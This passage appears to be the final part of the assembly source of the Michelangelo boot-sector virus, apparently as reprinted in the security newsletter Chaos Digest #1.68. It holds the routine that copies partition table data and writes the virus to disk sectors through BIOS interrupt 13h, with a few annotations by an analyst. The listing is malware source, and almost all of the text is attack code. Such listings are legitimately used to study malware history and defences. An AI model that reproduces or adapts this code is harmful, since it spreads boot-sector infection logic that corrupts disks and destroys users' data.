                jc      exitvirus
                mov     si,200h+offset partitioninfo    ;Copy partition
                mov     di,offset partitioninfo         ;table information
                mov     cx,21h
                rep     movsw
                mov     ax,301h                 ;Write to sector 8
                xor     bx,bx                   ;Copy virus to sector 1
                inc     cl
                int     13h
;*              jmp     short 01E0h
                db      0EBh, 32h               ;?This should crash?
;The following bytes are meaningless.
garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo:  db      42h dup (0)
michelangelo    ends
                end

------------------------------

End of Chaos Digest #1.68
************************************